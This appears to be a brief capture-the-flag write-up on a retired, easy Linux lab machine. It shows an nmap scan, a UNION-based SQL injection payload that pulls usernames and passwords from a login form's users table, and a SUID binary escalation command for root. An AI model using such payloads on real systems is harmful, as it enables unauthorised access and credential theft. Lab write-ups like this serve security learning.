c0rvex
Search
Tags

retired

linux, web, sqli

Lab: Example Machine

1 min read writeup easy

A walkthrough of the Example lab — SQLi to foothold, then SUID abuse for root.

Overview

Retired lab machine — easy difficulty, Linux target.

IP: 10.10.x.x | OS: Linux | Rating: Easy

Recon

nmap -sV -sC -p- 10.10.x.x -oA scans/initial

Open ports: 22 (SSH), 80 (HTTP).

Nmap scan results showing open ports 22 and 80
Initial nmap output — two open ports

Foothold

The login form at /login is vulnerable to UNION-based SQLi.

Payload hint 
' UNION SELECT 1,username,password FROM users-- -

Privilege Escalation

Found a SUID binary at /usr/local/bin/example. GTFObins has an entry.

/usr/local/bin/example -p

Discussion